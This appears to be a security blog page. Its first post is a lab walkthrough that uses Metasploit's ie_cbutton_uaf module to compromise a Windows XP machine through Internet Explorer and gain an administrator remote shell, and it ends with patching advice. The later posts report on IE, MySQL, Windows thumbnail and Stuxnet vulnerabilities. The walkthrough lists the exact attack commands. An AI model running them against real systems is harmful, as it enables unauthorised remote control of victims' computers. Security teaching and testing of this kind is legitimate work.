Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit

IE Zero Day 2

The end of the year saw several zero day exploits being released. One for RealPlayer version 15 and under, one for Nvidia Video Cards, and what we will focus on today, a remote exploit for Internet Explorer Version 6-8. The Internet Explorer Zero-Day exploit that was publicly acknowledged on December 29th, affects Windows XP SP3, Vista, Windows 7 and Server 2003 and 2008. Systems running IE 9 and 10 are not affected.

The exploit code has been publicly released and has already been added to Metasploit. We will demonstrate the exploit using Backtrack 5r3 and a Windows XP sp3 system.

So let’s get started.

  • Boot up your Backtrack 5 system and run the msfupdate command to make sure you get the latest exploits.

(Had a heck of a time with running the updates lately. Most recently it seemed to hang on updating an outlook.rb file. I got by it earlier by deleting the file and re-running the update. But for this example we won’t be needing it, so you can just hit (p) for postpone if it hangs on updating it.)

  • Next start the msfconsole.
  • Now you can search for the internet explorer exploit by typing “search internet explorer” or by just typing it in as below.

At the msf> prompt type:

  • use exploit/windows/browser/ie_cbutton_uaf

Then type “show options” to see what options can be set:

IE Zero Day 2

Okay, we will need to set the SRVHOST option to point to our Backtrack system. And we can change the URIPATH to something else other than random if we want. But first, let’s set the target as it defaults to Windows 7, and our target in this example is a Windows XP system:

IE Zero Day 1

Next, set the IP address of your Backtrack system:

  • set SRVHOST 192.168.0.120

And finally run the exploit:

  • exploit

IE Zero Day 4-1

Okay, at this point Metasploit starts up the Apache web server,creates the exploit and creates a random page to host it on. Now all we need is to surf to the URL given to us by Backtrack 5 using Internet Explorer on the Windows XP system:

IE Zero Day 3

That is it!

As soon as the user surfs to our Backtrack page, the exploit is run and a remote session is created:

IE Zero Day 4-2

(Note: There were no real warnings or alerts on the Windows XP side. It just seemed that the webpage didn’t do anything.)

We can type “sessions -l” to list all the remote shell sessions that Backtrack has created.

IE Zero Day 5

As you can see our Windows XP session is listed. Now if we simply connect to the session interactively (sessions -i 1), and run “getuid” we see that we have an administrator level shell:

IE Zero Day 6

And simply running “shell” drops us into the full remote shell:

IE Zero Day 7

So how do we stop this attack? If you are running older versions of Internet Explorer, UPDATE NOW! This attack does not work against the latest version of IE. Microsoft was supposed to release a patch for older IE versions today, to stop this attack, but they didn’t do it.

And with the fix really being to simply upgrade to the newest version, they probably won’t any time soon.

The fix is also the same with the RealPlayer and Nvidia Zero-days that I mentioned earlier. Simply download the latest updates of the software to protect against the exploits.

Advertisements

State Sponsored IE Vulnerability and a 4 Line MySQL Exploit

Some interesting news has come out in the last week about two serious Internet Explorer vulnerabilities and a MySql vulnerability that can be exploited by a four line exploit!

IE VULNERABILITES

Of the two latest Microsoft IE vulnerabilities, CVE-2012-1889 and CVE-2012-1875, the first seems the most interesting. Rumored to be “State-Sponsored” the vulnerability seems to focus on users using Gmail, MS Office and Internet Explorer. And as yet is still an active Zero Day exploit. Security software company Rapid 7 explains the vulnerability as follows:

“This is an uninitialized memory bug found in MSXML. According to Microsoft, such a component can be loaded from either Internet Explorer and Microsoft Office. This vulnerability is rumored to be “state-sponsored”, and what makes it really critical is it’s still an 0-day hijacking Gmail accounts. That’s right, that means if you’re using Gmail as well as Internet Explorer or Microsoft Office, you’re at risk. We expect this vulnerability to grow even more dangerous since there’s no patch, and it’s rather easy to trigger.”

The second IE exploit has been patched, but as yet there is no patch for CVE-2012-1889. Microsoft does offer a “FixIt” program as a work around until an official patch is released.

Rapid 7, the creative geniuses behind Metasploit, have already released exploit modules for both IE vulnerabilities so you can test your systems to see if they are vulnerable to the attack.

MySQL VULNERABILITY

Earlier this month, an advisory about a serious vulnerability in MySQL and MariaDB was released. According to a post on Seclists.org a situation exists where an attacker may be able to trick MySQL in allowing you to log in without a password by repeating log in attempts:

When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might’ve happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not.  Because the protocol uses random strings, the probability of hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and “root” almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent.

Security Expert David Kennedy (aka ReL1K) has released a four line Python exploit script to test for the vulnerability. Other sites say that the vulnerability can be written in a single shell line! Metasploit has released a module that uses the Authentication Bypass to dump usernames and password hashes from the MySQL server.

Fortunately only certain versions of MySQL and MariaDB are vulnerable. Check the security advisory for more information.

Simple Example of How Stuxnet Infects PLC Controls

Good video from Symantec with a simple demonstration of how the Stuxnet virus could actually modify the program being fed to a PLC controller. A PLC controller is simply a programmable driver that runs a motor or other industrial device. 

In the example, an air pump is connected to a PLC and programmed to run for 3 seconds. The motor correctly runs for three seconds, then shuts off. Once a modified DLL file is used, simulating a  Stuxnet attack, even though the pump is told to run for three seconds by the program, it runs continually.

The real Stuxnet virus would run Iran’s processing motors at high and low speeds while still displaying to the control console that the speed was constant. This in effect ruined the process of refining the fuel and also damaged the motors.

New Windows Thumbnail Image Zero-Day Attack

According to TheRegister, “Microsoft has confirmed reports that several versions of Windows are vulnerable to exploits that allow remote attackers to take full control of users’ computers using booby-trapped emails and websites.”

Apparently, remote code execution is possible when a specially crafted thumbnail image is viewed. The attack works against Windows XP & Vista, and Server 2003 & 2008. Windows 7 and Server 2008 R2 is immune to the exploit. It works not only against Office documents and E-mails, but also through network shares.  

According to the article, the exploit was made public at the South Korean “Power of Community” security conference. The exploit code has already been added to the popular security testing software Metasploit.

According to documentation in the exploit code on Metasploit’s site:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

Microsoft was concerned enough about it to release a warning statement, but has no plans to create an out of band security patch for it. We will have to wait until the next standard security update next week, if the fix is even ready by then.